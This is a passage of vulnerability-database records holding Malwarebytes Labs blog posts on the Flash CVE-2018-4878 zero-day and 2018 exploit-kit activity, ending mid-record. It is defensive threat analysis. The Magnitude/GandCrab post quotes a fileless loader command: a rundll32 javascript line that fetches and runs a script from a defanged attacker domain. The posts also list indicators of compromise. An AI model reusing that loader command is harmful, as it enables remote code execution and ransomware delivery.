"blog", "cvelist": ["CVE-2018-4878"], "description": "_Update (2018-02-06)_: Adobe has released a patch for this vulnerability. More information is available [here](<https://helpx.adobe.com/security/products/flash-player/apsb18-03.html>).\n\nWe tested this zero-day with a [proof-of concept](<https://blog.morphisec.com/cve-2018-4878-an-analysis-of-the-flash-player-hack>) that was made available. Rather than launching it from within Office, we turned it into a drive-by download attack. The animation below shows Malwarebytes blocking the exploit, and when the anti-exploit protection module is disabled, we can see the calculator launching.\n\n\n\n- -\n\nA new Flash Player zero-day has been found in recent targeted attacks, as [reported by KrCERT](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>). The flaw, which exists in Flash Player 28.0.0.137 and earlier versions, allows an attacker to remotely execute malicious code. On February 1, Adobe published a [security advisory](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) acknowledging this zero-day:\n\n> Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.\n\nThreat actors used a decoy Microsoft Excel document to lure their intended target (some South Korea users) in order to infect them with a remote administration tool named ROKRAT. While not obvious at first, an ActiveX object has been embedded into the document and contains the Flash exploit. Highlighting cells reveals a small white rectangle that represents the embedded object:\n\n\n\nUpon opening the spreadsheet, one of several South Korean websites will be contacted via a GET request containing the following three parameters:\n\n * a unique identifier\n * the Flash Player version\n * the Operating System version\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/URL_request.png> \"\" )\n\nThis is an important step because it retrieves a key used to decrypt the malicious shell code.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/decrypt.png> \"\" )\n\nBy the time we had access to this sample, the websites hosting it were down, which proved to be a showstopper in the exploitation and payload. [Malwarebytes](<http://www.malwarebytes.com/premium>) detects the remote administration tool that was dropped, as well as blocks the sites known to have hosted the key and payload.\n\n\n\nAdobe has said it will issue a patch for this zero-day sometime during the week of February 5. In the meantime, users are advised to disable or uninstall the Flash Player. We expect that this exploit will be used in larger scale attacks, including via malicious spam. We will keep you updated of any further developments.\n\n### **Indicators of compromise**\n \n \n 1588-2040.co[.]kr/design/m/images/image/image.php?\n dylboiler.co[.]kr\n\nSWF exploit\n \n \n FEC71B8479F3A416FA58580AE76A8C731C2294C24663C601A1267E0E5C2678A0\n\nThe post [New Flash Player zero-day comes inside Office document](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-05T20:55:16", "published": "2018-02-05T20:55:16", "id": "MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/", "type": "malwarebytes", "title": "New Flash Player zero-day comes inside Office document", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-05T18:51:30", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878"], "description": "Last week on Malwarebytes Labs, we explained [how to protect your computer from malicious cryptomining](<https://blog.malwarebytes.com/101/2018/02/how-to-protect-your-computer-from-malicious-cryptomining/>), we gave an [encryption 101](<https://blog.malwarebytes.com/threat-analysis/2018/02/encryption-101-shione-ransomware-case-study/>) lesson using ShiOne ransomware as a case study, and we offered an explanation about [SQL injection.](<https://blog.malwarebytes.com/security-world/business-security-world/2018/03/explained-sql-injection/>) We also released a report on [the state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) from its first resurgence in the fall until now.\n\nIn active malware, we discussed [how the RIG malvertising campaign uses cryptocurrency themes as a decoy](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy/>), how an old virus made its way onto a [Chinese DDoS bot](<https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/>), and how a [massive DDoS attack washed over GitHub](<https://blog.malwarebytes.com/threat-analysis/2018/03/massive-ddos-attack-washes-over-github/>).\n\nWe also drew your attention to our own [Chris Boyd](<https://twitter.com/paperghost>) appearing in [Jenny Radcliffe\u2019s Human Factor Podcast](<http://jennyradcliffe.com/the-deception-chronicles/>).\n\n### Other news\n\n * Does your endpoint solution [stop fileless attacks](<https://www.bricata.com/blog/fileless-attacks-security/>)? They are gaining traction, says a Ponemon Institute study. (Source: Bricata)\n * [Feedless](<https://www.theverge.com/2018/2/26/17046608/feedless-app-content-blocker-instagram-facebook-newsfeed>) is an iOS content blocker that takes the media out of social media. (Source: The Verge)\n * A serious remote code execution vulnerability in both the '[\u03bcTorrent](<https://thehackernews.com/2018/02/torrent-download-software.html>) desktop app for Windows and the newly launched '\u03bcTorrent Web' was reported. (Source: The Hacker News)\n * But apparently, the Torrent vulnerabilities have already been [fixed](<https://engineering.bittorrent.com/2018/02/22/httprpc-security-vulnerabilities-resolved-in-utorrent-bittorrent-and-utorrent-web/>). (Source: The BitTorrent Engineering Blog)\n * An [ad network](<https://arstechnica.com/information-technology/2018/02/ad-network-uses-advanced-malware-technique-to-conceal-cpu-draining-mining-ads/>) used an advanced malware technique to conceal CPU-draining mining ads. (Source: Ars Technica)\n * [US Supreme Court](<https://www.reuters.com/article/us-usa-court-microsoft/u-s-supreme-court-wrestles-with-microsoft-data-privacy-fight-idUSKCN1GB0GY>) wrestles with Microsoft data privacy fight. (Source: Reuters)\n * [Loapi](<http://www.newsweek.com/loapi-cryptocurrency-mining-malware-so-powerful-it-can-melt-your-phone-752517>) cryptocurrency mining malware is so powerful it can melt your phone. (Source: Newsweek)\n * [German government](<https://www.theguardian.com/world/2018/mar/01/german-government-intranet-under-ongoing-attack>) Intranet under ongoing attack. (Source: TheGuardian)\n * [Trustico](<https://www.bleepingcomputer.com/news/security/trustico-states-they-stored-private-keys-for-customers-ssl-certificates/>) states they stored private keys for customers' SSL certificates. (Source: Bleeping Computer)\n * [Flash exploit CVE-2018-4878](<https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign>) was spotted in the wild as part of massive malspam campaign. (Source: Morphisec)\n * [Equifax](<http://philadelphia.cbslocal.com/2018/03/01/equifax-hackers-stole-more/>) says hackers stole more than previously reported. (Source: CBS Philly)\n * Virus downs hundreds of [Tim Hortons](<https://www.ctvnews.ca/business/virus-downs-hundreds-of-tim-hortons-cash-registers-furious-owners-threaten-lawsuit-1.3821172>) cash registers; furious owners threaten lawsuit. (Source: CTV News)\n * [SgxSpectre](<https://www.bleepingcomputer.com/news/security/sgxspectre-attack-can-extract-data-from-intel-sgx-enclaves/>) attack can extract data from Intel SGX enclaves. (Source: Bleeping Computer)\n\nStay safe, everyone!\n\nThe post [Week in security (February 26 \u2013 March 4)](<https://blog.malwarebytes.com/security-world/week-in-security/2018/03/week-in-security-february-26-march-4/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-03-05T17:00:00", "published": "2018-03-05T17:00:00", "href": "https://blog.malwarebytes.com/security-world/week-in-security/2018/03/week-in-security-february-26-march-4/", "id": "MALWAREBYTES:026284ECC22DB2D1F343F9B66686DEF9", "type": "malwarebytes", "title": "Week in security (February 26 \u2013 March 4)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-24T18:24:19", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878", "CVE-2018-8174"], "description": "[Exploit kit](<https://blog.malwarebytes.com/glossary/exploit-kit/>) (EK) activity continues to surprise us as the weather cools, the leaves change, and we move into the fall of 2018. Indeed, shortly after our [summer review](<https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/>), a new exploit kit was discovered, and while no new vulnerabilities were added to the current EKs, several malvertising chains are still going strong.\n\n[Smoke Loader](<https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/>), [Ramnit](<https://blog.malwarebytes.com/detections/worm-ramnit/>), and AZORult are some of the most common payloads we've observed in the last few months\u2014particularly in Japan and Canada. The geo-targeted exploit kits such as Magnitude EK continue to predominantly affect South Korea and Taiwan.\n\nAnother interesting trend as of late is a decrease in [cryptomining](<https://blog.malwarebytes.com/glossary/cryptomining/>) payloads and an increase in ransomware drops instead, mostly via the Fallout and RIG EKs.\n\n### Fall 2018 EK overview\n\n * Fallout EK\n * RIG EK\n * GrandSoft EK\n * Magnitude EK\n * Underminer EK\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash\u2019s [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) continue to be the most relied upon vulnerabilities.\n\n### Fallout EK\n\nFallout EK, [discovered by team nao_sec](<https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html>), is the newest exploit kit which takes its name and URI patterns from the defunct Nuclear EK. Fallout EK has diverse campaigns that are not limited to a particular geographic location and therefore could be seen as a direct rival to RIG EK. Due to its constantly changing and complex URI paths, Fallout EK stands out from its counterparts.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/FalloutEK.png> \"\" )\n\nThe payload in this sequence is [GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>).\n \n \n 229BD13628C1AE3E84A9C7860617B836ACCDE4D932D2A2DC9DB64E78C211DA41\n\n### RIG EK\n\nNot much has changed with RIG EK in recent times, but since the arrival of its new competitor, Fallout EK, our telemetry shows its usage has slowly declined in the past quarter.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/RIGEK.png> \"\" )\n\nThe payload in this sequence is Kraken ransomware.\n \n \n 2F5DEC0A8E1DA5F23B818D48EFB0B9B7065023D67C617A78CD8B14808A79C0DC\n\n### GrandSoft EK\n\nGrandSoft EK is a little less common than the other EKs that we track. Some of its delivery chains include compromised websites acting as an intermediary gate. Thanks to team nao_sec for sharing some recent traffic.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/GrandSoftEK.png> \"\" )\n\nThe payload in this sequence is the Ramnit banker.\n \n \n 6FDA89FBB9FD66EE929665E376077E07C1BD2AF2D91C63148A7F5E818E4D27B2\n\n### Magnitude EK\n\nMagnitude EK continues to faithfully deliver its own brand of ransomware to targeted countries, such as South Korea. and Taiwan. It is one of the rare exploit kits that uses a truly fileless payload, which makes its extraction to disk a challenge.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/MagnitudeEK.png> \"\" )\n\nThe payload in this sequence is Magniber ransomware (extracted with [@hasherezade](<https://twitter.com/hasherezade>)'s [hollows_hunter](<https://github.com/hasherezade/hollows_hunter>)).\n \n \n F229AE5F68C72E678D4D706CE84ABFCCC983A299E39BEBCD990AECE7E3F97D71\n\n### Underminer EK\n\nWe spotted Underminer EK a few times during the past quarter. This exploit kit is unique because its payload delivery, a bootkit, is vastly different from any other EK.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/UnderminerEK.png> \"\" )\n\nThe payload in this sequence is a bootkit infector.\n\n### Mitigation\n\nAs always, it is important to keep systems up-to-date and reduce the attack surface whenever possible. The current vulnerabilities used by the above exploit kits have already been patched by their respective vendors.\n\nMalwarebytes' [application hardening protection layer](<https://www.malwarebytes.com/business/endpointprotectionandresponse/?utm_source=digital&utm_medium=blog&utm_campaign=q3fy19>) blocks these EKs before they even get a chance to drop their payloads.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/EKs_fall_2018.gif> \"\" )\n\n### Extended shelf life\n\nThe recent addition of Fallout EK has given exploit kits yet another extension on their otherwise limited shelf life by tapping into existing and new malvertising campaigns with a wider geographic focus.\n\nAs 2019 comes closer, Internet Explorer is still offering opportunities for newer exploits yet to be weaponized, but we could see other browsers such as Edge gain some attention as well.\n\nThe post [Exploit kits: fall 2018 review](<https://blog.malwarebytes.com/threat-analysis/2018/10/exploit-kits-fall-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-10-24T16:10:54", "published": "2018-10-24T16:10:54", "id": "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "href": "https://blog.malwarebytes.com/threat-analysis/2018/10/exploit-kits-fall-2018-review/", "type": "malwarebytes", "title": "Exploit kits: fall 2018 review", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T17:51:50", "bulletinFamily": "blog", "cvelist": ["CVE-2016-0189", "CVE-2018-4878"], "description": "In the past, we used to do a [blog series](<https://blog.malwarebytes.com/threat-analysis/2016/02/top-exploit-kits-round-up-january-edition/>) on exploit kits where we would periodically check in on the main players in the market. In March 2017, we wrote the [Winter 2017 review,](<https://blog.malwarebytes.com/threat-analysis/2017/03/exploit-kits-winter-2017-review/>) before exploit kit activity dropped down to a whisper. We've since discontinued our blog series, for lack of developments.\n\nA year later, however, exploit kits are showing signs of life. An uptick in campaigns and the sharpshooter-like targeting of a single country make exploits once again worth writing about.\n\n### Overview\n\nRIG EK still remains the most common exploit kit used by different actors in a diverse set of malvertising campaigns. We haven't observed [Terror EK since Fall 2017](<https://blog.malwarebytes.com/threat-analysis/2017/11/terror-exploit-kit-goes-https-all-the-way/>), but another older kit has made a comeback. And even though it remains largely unsophisticated, GrandSoft EK has maintained its activity.\n\nWhile we aren't seeing Sundown EK anymore, a spin-off named GreenFlash Sundown was the first (and only so far) to leverage a new Flash Player zero-day and distribute ransomware. Magnitude EK is the other exploit kit also consistently dropping its own Magniber ransomware.\n\nToday's exploit kits rely on Internet Explorer and Flash Player vulnerabilities for exploitation. We found it particularly interesting that many of those exploit kits are targeting South Korea specifically.\n\nCoincidentally or not, both [CVE-2016-0189](<http://www.zdnet.com/article/south-korea-victim-of-internet-explorer-zero-day-vulnerability/>) (IE) and [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash) were both first used in targeted zero-day attacks against South Korea before they were added into EKs.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/CVEs.png> \"\" )\n\n### RIG-v EK\n\nRIG EK is by far the most popular exploit kit these days, with many different distribution campaigns and, as a result, the most diverse payloads ([banking Trojans](<http://malware-traffic-analysis.net/2018/03/05/index2.html>), [coin miners](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy/>), and [ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>), to name a few).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/RIGEK.png> \"\" )\n\n### GrandSoft EK\n\nGrandSoft is an older exploit kit that, for a strange reason, decided to make a comeback. Its code is simplistic and decipherable, and it uses rotating hostnames all housed on the same server (62.109.4[.]135). GrandSoft was used to [distribute the GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>) in late January, but has also been observed dropping [AZORult stealer](<http://malware-traffic-analysis.net/2018/03/15/index3.html>), [QuantLoader](<https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/>), and of course, [miners](<https://traffic.moe/2018/02/09/index.html>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/GrandSoft_EK.png> \"\" )\n\n### GreenFlash Sundown\n\nGreenFlash Sundown is an interesting exploit kit that uses URI patterns that are almost impossible to match without causing false positives. It makes heavy use of the Flash Player to hide its redirections and malicious calls rather than relying on typical HTML/JS. Beyond this stealth feature, it is also the first exploit kit to integrate a newly-found Flash Player zero-day to [target South Koreans with the Hermes ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/GreenFlash_Sundown_EK_.png> \"\" )\n\n### Magnitude EK\n\nMagnitude is a long-standing exploit kit that for some time now has been exclusively focusing on South Korea. Contrary to GreenFlash Sundown, it has dropped all support for the Flash Player and only relies on Internet Explorer for exploitation. Magnitude comes with its very own payload, [Magniber](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>), a piece of ransomware that once again only targets South Korea.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/Magnitude__EK.png> \"\" )\n\n### Mitigation\n\nWe ran all these exploit kits in our lab using Internet Explorer 10 and two different versions of the Flash Player. For GreenFlash Sundown, we updated our version of Flash to 28.0.0.137 to trigger the newest zero-day. [Malwarebytes](<https://www.malwarebytes.com/>) stopped all these exploit attempts before any payload had a chance to be dropped or executed.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/Anti-Exploit_EKs.gif> \"\" )\n\n### Summary\n\nWhile exploit kits are struggling to stay relevant in a browser market share dominated by Google Chrome and a rapid decline in Flash Player usage, we have noted that several different actors are still engaged in distribution via multiple malvertising chains. Some of these actors have taken over tools once used in broader campaigns to distribute their own payload and narrow down their targets to a single country.\n\nEven though exploit kits have not evolved much in terms of firepower, the traffic distribution systems and gates leading to them remain active and diverse. For this reason, threat actors often mix traffic-based on user-agent information to divert victims toward exploit kits or social engineering\u2013based attacks, if the former is not deemed to be a viable option.\n\n### Acknowledgment\n\nThanks to [@nao_sec](<https://twitter.com/nao_sec>) for additional information about GrandSoft EK.\n\nThe post [Exploit kits: Winter 2018 review](<https://blog.malwarebytes.com/threat-analysis/2018/03/exploit-kits-winter-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-03-29T15:00:00", "published": "2018-03-29T15:00:00", "href": "https://blog.malwarebytes.com/threat-analysis/2018/03/exploit-kits-winter-2018-review/", "id": "MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "type": "malwarebytes", "title": "Exploit kits: Winter 2018 review", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-17T18:23:21", "bulletinFamily": "blog", "cvelist": ["CVE-2016-0189", "CVE-2018-4878"], "description": "The GandCrab ransomware is reaching far and wide via [malspam](<https://twitter.com/executemalware/status/986070506351755264>), [social engineering schemes](<https://twitter.com/nao_sec/status/984099138445852672>), and [exploit kit campaigns](<https://twitter.com/malware_traffic/status/985258567291883521>). On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.\n\nWhile Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from [Magniber](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>), which was extremely thorough at avoiding other geolocations.\n\nMagnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. The variations of this technique have been [known for several years](<http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3377>) and used by other families such as by Poweliks, but they are a new addition to Magnitude.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/Mag_Crab.png> \"\" )\n\n_Figure 1: Magnitude EK traffic capture with the GandCrab payload_\n\nMagnitude has always experimented with unconventional ways to load its malware, for example via [binary padding](<https://blog.malwarebytes.com/threat-analysis/2017/08/cerber-ransomware-delivered-format-different-order-magnitude/>), or more recently via [another technique](<https://twitter.com/kafeine/status/980505556715786242>), but still exposing it \"in the clear\" from traffic or network packet capture.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/WSH_injection_.png> \"\" )\n\n_Figure 2: Magnitude EK dropping Magniber on April 4, 2018_\n\nThe payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.\n \n \n \"C:\\Windows\\System32\\rundll32.exe\" javascript:\"\\..\\mshtml,RunHTMLApplication \";\n document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/encoded_payload.png> \"\" )\n\n_Figure 3: Innocuous scriptlet hides the payload_\n\nAfter the payload is injected into _explorer.exe_, it immediately attempts to reboot the machine. If we suspend that process and use [@hasherezade](<https://twitter.com/hasherezade>)'s [PE-Sieve](<https://github.com/hasherezade/pe-sieve>), we can actually dump the GandCrab DLL from memory:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/Dumped_payload.png> \"\" )\n\n_Figure 4: Extracting the payload from memory using PE-Sieve_\n\nUpon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/note.png> \"\" )\n\n_Figure 5: GandCrab's ransom note_\n\nA recent [law enforcement operation](<https://www.europol.europa.eu/newsroom/news/free-data-recovery-kit-for-victims-of-gandcrab-ransomware-now-available-no-more-ransom>) provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.\n\nTime will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.\n\n### Indicators of compromise\n\nDumped GandCrab DLL\n \n \n 9daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a\n\nThe post [Magnitude exploit kit switches to GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-04-17T16:58:26", "published": "2018-04-17T16:58:26", "id": "MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "href": "https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/", "type": "malwarebytes", "title": "Magnitude exploit kit switches to GandCrab ransomware", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-07T16:58:39", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878", "CVE-2018-8174"], "description": "The uptick trend in cybercriminals using exploit kits that we first noticed in our [spring 2018 report](<https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/>) has continued into the summer. Indeed, not only have new kits been found, but older ones are still showing signs of life. This has made the summer quarter one of the busiest we've seen for exploits in a while.\n\nPerhaps one caveat is that, apart from the RIG and GrandSoft exploit kits, we observe the majority of EK activity contained in Asia, maybe due to a greater likelihood of encountering vulnerable systems in that region. Malware distributors have complained that \"loads\" for the North American or European markets are too low via exploit kit, but other areas are still worthy targets.\n\nIn addition, we have witnessed many smaller and unsophisticated attackers using one or two exploits bluntly embedded in compromised websites. In this era of widely-shared exploit proof-of-concepts (PoCs), we are starting to see an increase in what we call \"pseudo-exploit kits.\" These are drive-by downloads that lack proper infrastructure and are typically the work of a lone author.\n\nIn this post, we will review the following exploit kits:\n\n * RIG EK\n * GrandSoft EK\n * Magnitude EK\n * GreenFlash Sundown EK\n * KaiXin EK\n * Underminer EK\n * Pseudo-EKs\n\n### CVEs\n\nTwo newly found vulnerabilities in 2018, Internet Explorer's [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash's [CVE-2018-4878,](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) have been widely adopted and represent the only real attack surface at play. Nevertheless, some kits are still using older exploits in technologies that are being retired, and most likely with little efficacy.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/EKs_CVEs.png> \"\" )\n\n### RIG EK\n\nRIG EK remains quite active in malvertising campaigns and compromised websites, and is one of the few exploit kits with a wider geographic presence. It is pictured below in what we call the HookAds campaign, delivering the AZORult stealer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/RIG_EK.png> \"\" )\n\n### GrandSoft EK\n\nGrandSoft is probably the second most active exploit kit with a backend infrastructure that is fairly static in comparison to RIG. Interestingly, both EKs can sometimes be seen sharing the same distribution campaigns, as pictured below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/GrandSoft_EK.png> \"\" )\n\n### Magnitude EK\n\nMagnitude, the South Korean\u2013focused EK, keeps delivering its own strain of ransomware (Magniber). We [documented changes](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>) in Magniber in recent weeks with some code improvements, as well as a wider casting net among several Asian countries.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Magnitude_EK.png> \"\" )\n\n### GreenFlash Sundown EK\n\nA sophisticated but more elusive EK focusing on Flash's [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>), GreenFlash Sundown is still active in parts of Asia thanks to a network of compromised OpenX ad servers. We haven't seen any major changes since the last time we profiled it, and it is [still distributing the Hermes ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/GreenFlash_Sundown_EK.png> \"\" )\n\n### KaiXin EK\n\nKaiXin EK (also known as CK VIP) is an [older exploit kit](<http://www.kahusecurity.com/2012/08/new-chinese-exploit-pack/>) of Chinese origin, which has maintained its activity over the years. It is unique for the fact that it uses a combination of old (Java) and new vulnerabilities. When we captured it, we noted that it pushed the Gh0st RAT (Remote Access Trojan).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/KaiXin_EK.png> \"\" )\n\n### Underminer EK\n\nAlthough this exploit kit was only identified and named recently, it has [been around since at least November 2017](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>) (perhaps with only limited distribution to the Chinese market). It is an interesting EK from a technical perspective with, for example, the use of encryption to package its exploit and prevent offline replays using traffic captures.\n\nAnother out-of-the-ordinary aspect of Underminer is its payload, which isn't a packaged binary like others, but rather a set of libraries that install a bootkit on the compromised system. By altering the device's Master Boot Record, this threat can launch a cryptominer every time the machine reboots.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Underminer_EK.png> \"\" )\n\n### Pseudo-EKs\n\nMany exploit packs have leaked and been poached over the years, notwithstanding the availability of a large number of other dumps (i.e. HackingTeam) or proofs-of-concept. As a result, it is not surprising to see many less-skilled actors putting together their own \"pseudo-exploit kits.\" They are a far cry from being an EK\u2014they are usually static in nature, their copy/paste exploits are buggy, and consequently, they are only used by the same threat actor in limited distribution. The pseudo-exploit we picture below (offensive domain name has been blurred) is one of the better ones we saw in July, in particular for its use of CVE-2018-8174.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Pseudo-EK.png> \"\" )\n\n### Mitigation\n\nWe are continuously checking drive-by download attacks against our software. This time around, we had a more extensive test bed thanks to new and old exploit kits making it into this summer edition. Malwarebytes continues to block exploit kits with different layers of technology to protect our customers.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Summer_EKs_replay.gif> \"\" )\n\n### Don't call it a comeback\n\nIt seems as though talking about the demise of exploit kits triggered an opposite reaction. Certainly, some digging is required to encounter the more obscure or geo-focused toolkits, but this revival of sorts continues thanks to Internet Explorer's\u2014and to a lesser extent Flash's\u2014newly found vulnerabilities.\n\nWhile IE has a small and decreasing global market share ([7 percent](<http://gs.statcounter.com/browser-market-share/desktop/worldwide/#monthly-201707-201807>)), it still has an important presence in countries like South Korea ([31 percent](<http://gs.statcounter.com/browser-market-share/desktop/south-korea/#monthly-201707-201807>)) or Japan ([18 percent](<http://gs.statcounter.com/browser-market-share/desktop/japan/#monthly-201707-201807>)), which could explain why there is still notable activity in a few select regions.\n\nExploit kits, even in a reduced and less impactful form, are likely to stick around for a while, at least for as long as people use a browser that wants to latch on indefinitely.\n\nThe post [Exploit kits: summer 2018 review](<https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-08-07T15:00:00", "published": "2018-08-07T15:00:00", "id": "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "href": "https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/", "type": "malwarebytes", "title": "Exploit kits: summer 2018 review", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-16T18:29:27", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878", "CVE-2018-8174"], "description": "_This blog post was authored by [@hasherezade](<https://twitter.com/hasherezade>) and [J\u00e9r\u00f4me Segura](<https://blog.malwarebytes.com/author/jeromesegura/>)._\n\nThe Magnitude exploit kit is one of the longest-serving browser exploitation toolkits among those still in use. After its inception in [2013](<https://malware.dontneedcoffee.com/2013/10/Magnitude.html>), it enjoyed worldwide distribution with a liking for 